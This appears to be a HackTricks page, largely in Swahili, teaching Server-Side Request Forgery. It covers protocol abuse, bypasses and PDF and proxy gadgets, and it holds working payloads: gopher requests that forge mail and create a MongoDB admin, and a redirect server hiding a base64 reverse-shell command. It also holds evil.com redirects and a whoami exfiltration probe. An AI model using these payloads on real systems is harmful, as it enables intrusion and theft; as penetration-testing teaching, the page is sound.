SSRF (Server Side Request Forgery)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

Hitilafu ya Server-side Request Forgery (SSRF) hutokea wakati mshambuliaji anavyopata udhibiti juu ya server-side application ili kufanya HTTP requests kwa domain ya chaguo lake. Hitilafu hii inawafichua server kwa maombi ya nje yoyote yaliyotumwa na mshambuliaji.

Kukamata SSRF

Kitu cha kwanza unachopaswa kufanya ni kukamata mwingiliano wa SSRF unaotengenezwa na wewe. Ili kukamata mwingiliano wa HTTP au DNS unaweza kutumia tools kama:

Whitelisted Domains Bypass

Kawaida utagundua kuwa SSRF inafanya kazi tu katika certain whitelisted domains au URL. Katika ukurasa ufuatao una compilation of techniques to try to bypass that whitelist:

URL Format Bypass

Bypass via open redirect

Ikiwa server haijalindwa kikamilifu unaweza bypass all the restrictions by exploiting an Open Redirect inside the web page. Kwa sababu ukurasa wa wavuti utaruhusu SSRF to the same domain na kwa uwezekano utafuata redirects, unaweza kutumia Open Redirect kufanya server ifikie rasilimali za ndani yoyote.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf

Protokoli

  • file://
  • Mfumo wa URL file:// umeelezewa, ukielekeza moja kwa moja kwenye /etc/passwd: file:///etc/passwd
  • dict://
  • Scheme ya URL ya DICT inatumika kwa kufikia definitions au orodha za maneno kupitia protocol ya DICT. Mfano unaonyesha URL iliyojengwa inayolenga neno maalum, database, na nambari ya entry, pamoja na mfano wa script ya PHP ambayo inaweza kutumika vibaya kuungana na server ya DICT kwa kutumia credentials zilizotolewa na mshambuliaji: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
  • SFTP://
  • Imetambuliwa kama protocol ya kuhamisha files kwa usalama kupitia secure shell; mfano unaonyesha jinsi script ya PHP inaweza kutumiwa vibaya kuungana na SFTP server ya hatari: url=sftp://generic.com:11111/
  • TFTP://
  • Trivial File Transfer Protocol, inayofanya kazi juu ya UDP, imetajwa pamoja na mfano wa script ya PHP iliyoundwa kutuma ombi kwa TFTP server. Ombi la TFTP limefanywa kwa ‘generic.com’ kwenye port ‘12346’ kwa ajili ya file ‘TESTUDPPACKET’: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
  • LDAP://
  • Sehemu hii inahusu Lightweight Directory Access Protocol, ikisisitiza matumizi yake kwa kusimamia na kufikia huduma za taarifa za directory zilizogawanywa kupitia mitandao ya IP. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
  • SMTP
  • Mbinu moja inaelezewa ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufichua internal domain names na hatua za ziada za uchunguzi kulingana na taarifa hiyo.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
  • Curl URL globbing - WAF bypass
  • Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kusaidia kuvuka WAFs. Kwa mfano, katika hii writeup unaweza kupata mfano huu wa path traversal via file protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://
  • Uwezo wa itifaki ya Gopher kubainisha IP, port, and bytes kwa mawasiliano na server umeelezewa, pamoja na zana kama Gopherus na remote-method-guesser kwa ajili ya kutengeneza payloads. Mifano miwili tofauti zimeonyeshwa:

Gopher://

Kutumia itifaki hii unaweza kubainisha the IP, port and bytes unayotaka server isend. Kisha, kwa msingi unaweza kutumia SSRF ili kuwasiliana na server yoyote ya TCP (lakini unahitaji kujua jinsi ya kuzungumza na huduma kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kutengeneza payloads kwa huduma mbalimbali. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa huduma za Java RMI.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Back connect kwa 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB – Unda mtumiaji mwenye username=admin, password=admin123 na permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF via Referrer header & Others

Programu za analytics kwenye servers mara nyingi huandika Referrer header ili kufuatilia viungo vinavyoingia, mazoea ambayo kwa bahati mbaya huweka wazi applications kwa udhaifu za Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu hizo zinaweza kutembelea URL za nje zilizotajwa kwenye Referrer header ili kuchambua yaliyomo kwenye tovuti inayorefer. Ili kugundua udhaifu huo, plugin ya Burp Suite “Collaborator Everywhere” inapendekezwa, ikitumia jinsi zana za analytics zinavyoshughulikia Referer header kutambua maeneo yanayoweza kushambuliwa na SSRF.

SSRF via SNI data from certificate

Mkonfigurasi isiyofaa ambayo inaweza kuwezesha muunganisho kwa backend yoyote kupitia usanidi rahisi inaonyeshwa kwa mfano wa Nginx configuration:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika mpangilio huu, thamani kutoka kwenye sehemu ya Server Name Indication (SNI) inatumiwa moja kwa moja kama anwani ya backend. Mpangilio huu unaonyesha udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kubainisha tu anwani ya IP au jina la kikoa unalotaka katika sehemu ya SNI. Mfano wa eksploitaji ili kulazimisha muunganisho kwa backend yoyote, kama internal.host.com, kwa kutumia amri ya openssl umeonyeshwa hapa chini:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF kupitia TLS AIA CA Issuers (Java mTLS)

Baadhi ya TLS stacks zitapakua kiotomatiki intermediate CAs zilizokosekana kwa kutumia Authority Information Access (AIA) → CA Issuers URI ndani ya cheti cha peer. Katika Java, kuwezesha -Dcom.sun.security.enableAIAcaIssuers=true wakati wa kuendesha huduma ya mTLS kunafanya server irejelee URIs zinazodhibitiwa na mshambuliaji kutoka kwenye cheti cha client wakati wa handshake, kabla ya logic yoyote ya HTTP kuanza.

  • Requirements: mTLS imewezeshwa, Java AIA fetching imewezeshwa, mshambuliaji anaweza kuwasilisha client cert yenye AIA CA Issuers URI iliyotengenezwa.
  • Triggering SSRF (mfano Java 21):
java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

Matokeo ya debug ya certpath ya Java yanaonyesha CertStore URI:http://localhost:8080, na nc inakamata ombi la HTTP lenye User-Agent inayoweza kudhibitiwa kutoka -Dhttp.agent, ikithibitisha SSRF wakati wa uhakiki wa cheti.

  • DoS via file://: kuweka AIA CA Issuers kuwa file:///dev/urandom kwenye mashine za aina ya Unix kunafanya Java kuitendea kama CertStore na kusoma bytes za nasibu zisizo na mipaka, kuifanya core moja ya CPU ifanye kazi mkononi na kuzuia muunganisho ufuatao hata baada ya client kutengana.

SSRF kupitia CSS Pre-Processors

LESS ni pre-processor maarufu wa CSS ambaye huongeza variables, mixins, functions na directive yenye nguvu ya @import. Wakati wa compilation engine ya LESS itafanya fetch ya rasilimali zinazorejelewa kwenye statements za @import na kuingiza (“inline”) yaliyomo yao kwenye CSS inayotokana wakati chaguo la (inline) linapotumika.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF na Command Injection

Inaweza kuwa vyema kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

Uundaji wa PDFs

Ikiwa ukurasa wa wavuti unatengeneza PDF moja kwa moja ukiwa unaweka baadhi ya taarifa ulizotoa, unaweza kuongeza JS ambayo itatekelezwa na PDF creator mwenyewe (server) wakati wa kuunda PDF na utaweza kutumia SSRF. Pata taarifa zaidi hapa.

Kutoka SSRF hadi DoS

Tengeneza vikao vingi na ujaribu kupakua faili nzito ukitumia SSRF kutoka vikao hivyo.

SSRF PHP Functions

Angalia ukurasa ufuatao kwa PHP zilizo dhaifu na hata Wordpress functions:

PHP SSRF

SSRF Redirect to Gopher

Kwa baadhi ya udukuzi unaweza kuhitaji kutuma response ya redirect (labda kutumia protocol tofauti kama gopher). Hapa kuna code mbalimbali za python za kujibu kwa redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Proxies zilizosanidi vibaya kwa SSRF

Mbinu from this post.

Flask

Flask proxy vulnerable code ```python from flask import Flask from requests import get

app = Flask(‘main’) SITE_NAME = ‘https://google.com’

@app.route(‘/’, defaults={‘path’: ‘’}) @app.route(‘/path:path’)

def proxy(path): return get(f’{SITE_NAME}{path}’).content

if name == “main”: app.run(threaded=False)

</details>

Flask inaruhusu kutumia **`@`** kama alama ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji la awali kuwa jina la mtumiaji** na kuingiza jina jipya. Ombi la shambulio:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Msimbo ulio dhaifu:

Iligundulika kuwa inawezekana kuanza njia ya ombi kwa alama ;, ambayo inaruhusu kisha kutumia @ na kuingiza seva mpya ya kufikiwa. Ombi la shambulio:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP seva ya wavuti ya ndani

Msimbo wa PHP wenye udhaifu ```php

$proxy_site = $site.$current_uri; var_dump($proxy_site);

echo “\n\n”;

$response = file_get_contents($proxy_site); var_dump($response); ?>

</details>

PHP inaruhusu matumizi ya **char `*` before a slash in the path** ya URL, hata hivyo, ina vikwazo vingine kama vile inaweza kutumika tu kwa root pathname `/` na nukta `.` haziruhusiwi kabla ya slash ya kwanza, hivyo inahitajika kutumia anwani ya IP iliyokodishwa kwa hex bila nukta (dotless-hex) kwa mfano:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

Reverse proxies ambazo zinakubali absolute URLs katika request line (open forward-proxy)

Baadhi ya reverse proxies pia zinakubali absolute-form request lines (GET http://10.0.0.5:8080/path HTTP/1.1) na zituma URL kama ilivyo kwa backend badala ya kuikataa au kuibadilisha kwa configured upstream. Hii inageuza reverse proxy kuwa pre-auth forward proxy with full-read SSRF, ikijumuisha upatikanaji wa huduma zilizofungwa kwa localhost ambazo kawaida zingeweza kutoifikika kutoka Internet.

Key points:

  • Request line controls destination: mamlaka katika absolute URL hubatilisha routing ya kawaida; header ya Host kawaida hupuuzwa.
  • Full response returned: majibu kutoka kwa internal hosts hurudishwa, hivyo unaweza kuorodhesha na kuingiliana (mfano, SOAP/Axis2, Keycloak, admin consoles) badala ya probe za kupiga kwa macho.
  • Works on localhost: GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n inatosha kufikia listeners zinazosikiliza kwenye loopback pekee.
  • Abuse as pivot: combine na vulns zingine (e.g., upload endpoints) kufikia services za intra-host.

Minimal probe:

GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

If you see the upstream response instead of a 400, the appliance is acting as an open proxy.

DNS Rebidding CORS/SOP bypass

If you are having problems to exfiltrate content from a local IP because of CORS/SOP, DNS Rebidding can be used to bypass that limitation:

CORS - Misconfigurations & Bypass

Automated DNS Rebidding

Singularity of Origin ni zana ya kutekeleza DNS rebinding attacks. Inajumuisha vipengele vinavyohitajika ku-rebind anwani ya IP ya attack server DNS name kwa anwani ya IP ya mashine lengwa na ku-serve attack payloads ili exploit software zilizo vunja kwenye mashine lengwa.

Pia angalia publicly running server in http://rebind.it/singularity.html

DNS Rebidding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Stuff on local ports

Attack:

  1. Ombi kwa user/bot i-access domain inayoendeshwa na attacker
  2. The TTL of the DNS is 0 sec (kwa hivyo the victim ataangalia IP ya domain tena hivi karibuni)
  3. Muunganisho wa TLS connection unaanzishwa kati ya the victim na domain ya attacker. The attacker anaingiza payload inside the Session ID or Session Ticket.
  4. The domain itaanza infinite loop ya redirects dhidi ya yeye mwenyewe. Lengo lake ni kumfanya user/bot a-access domain hadi itafanya again DNS request ya domain.
  5. Katika DNS request sasa inarudisha private IP (127.0.0.1 kwa mfano)
  6. The user/bot itajaribu reestablish the TLS connection na ili kufanya hivyo itatuma Session ID/Ticket ID (ambapo payload ya attacker ilikuwa imehifadhiwa). Kwa hivyo hongera, umefanikiwa kumfanya the user/bot attack himself.

Kumbuka kwamba wakati wa attack hii, ikiwa unataka ku-attack localhost:11211 (memcache) unahitaji kumfanya the victim a-establish initial connection na www.attacker.com:11211 (the port must always be the same).
Ili perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi angalia talk inayofafanua attack hii: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

Tofauti kati ya blind SSRF na SSRF isiyo blind ni kwamba katika blind hutaona response ya SSRF request. Hivyo, ni vigumu zaidi ku-exploit kwa sababu utaweza ku-exploit tu vulnerabilities zinazojulikana.

Time based SSRF

Kupima muda wa majibu kutoka server kunaweza kusaidia kujua kama resource ipo au la (labda inachukua muda mrefu zaidi kufikia resource iliyopo kuliko ile isiyopo)

From blid to full abusing status codes

Kulingana na blog post, baadhi ya blind SSRF zinaweza kutokea kwa sababu hata kama URL lengwa inarudisha 200 status code (kama AWS metadata), data hii si imepangwa vizuri na kwa hivyo app inaweza kukataa kuionyesha.

Hata hivyo, imegunduliwa kuwa kutuma responses za redirect zianzia 305 hadi 309 katika SSRF kunaweza kufanya application ifuate redirects hizi huku ikiingia katika error mode ambayo haitakagua tena muundo wa data na inaweza kuionyesha tu.

The python server used to exploit this is the following:

@app.route("/redir")
def redir():
count = int(request.args.get("count", 0)) + 1
# Pump out 305, 306, 307, 308, 309, 310 ...
weird_status = 301 + count
if count >= 10:                      # after 5 “weird” codes
return redirect(METADATA_URL, 302)
return redirect(f"/redir?count={count}", weird_status)

@app.route("/start")
def start():
return redirect("/redir", 302)

Steps:

  • First 302 gets the app to start following.
  • Then it receives 305 → 306 → 307 → 308 → 309 → 310.
  • After the 5th strange code the PoC finally returns 302 → 169.254.169.254 → 200 OK.

What happens inside the target:

  • libcurl itself does follow 305–310; it just normalises unknown codes to “follow.”
  • After N weird redirects (≥ 5 here) the application’s own wrapper decides “something is off” and switches to an error mode meant for debugging.
  • In that mode it dumps the entire redirect chain plus final body back to the outside caller.
  • Result: attacker sees every header + the metadata JSON, mission accomplished.

Note that this is interesting to leak status codes that you couldn’t leak before (like a 200). However, if somehow you could also select the status code of the response (imagine that you can decide that the AWS metadata responds with a 500 status code), there might be some status codes that directly leak the content of the response.

HTML-to-PDF renderers as blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>
  • TCPDF 6.10.0 hufanya majaribio kadhaa ya upakaji kwa kila rasilimali <img>, hivyo payload moja inaweza kuzalisha requests nyingi (inayosaidia kwa timing-based port scans).
  • html2pdf hufulisha tabia ya TCPDF kwa <img> na inaongeza kuvuta CSS ndani ya Css::extractStyle(), ambayo inaita tu file_get_contents($href) baada ya ukaguzi mdogo wa scheme. Tumia vibaya ili kugonga loopback services, RFC1918 ranges, au cloud metadata endpoints.
  • Changanya primitive hii ya SSRF na HTML-to-PDF path traversal tricks ili leak both internal HTTP responses and local files rendered into the PDF.

Wataalamu wa hardening wanapaswa kuondoa URL za nje kabla ya ku-render au kuhifadhi renderer katika sandbox ya mtandao; hadi wakati huo, chukulia PDF generators kama blind SSRF proxies.

Cloud SSRF Exploitation

Ikiwa utapata udhaifu wa SSRF kwenye mashine inayokwenda ndani ya mazingira ya cloud unaweza kuwa na uwezo wa kupata taarifa za kuvutia kuhusu mazingira ya cloud na hata credentials:

Cloud SSRF

SSRF Vulnerable Platforms

Majukwaa kadhaa yanayojulikana yana au yamekuwa na udhaifu wa SSRF, angalia hizi katika:

SSRF Vulnerable Platforms

Tools

SSRFMap

Chombo cha kugundua na ku-exploit udhaifu wa SSRF

Gopherus

Chombo hiki kinatengeneza Gopher payloads kwa:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

remote-method-guesser ni skana ya udhaifu wa Java RMI inayounga mkono operesheni za shambulio kwa udhaifu wa kawaida wa Java RMI. Sehemu kubwa ya operesheni zinazopatikana zinaunga mkono chaguo la --ssrf, ili kuzalisha SSRF payload kwa operesheni iliyohitajika. Pamoja na chaguo la --gopher, gopher payloads tayari kutumia zinaweza kuzalishwa moja kwa moja.

SSRF Proxy

SSRF Proxy ni server ya proxy ya HTTP yenye multi-threaded iliyoundwa kupitisha trafiki ya client HTTP kupitia HTTP servers zilizo vulnerable kwa Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack \xc2\xb7 GitHub

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks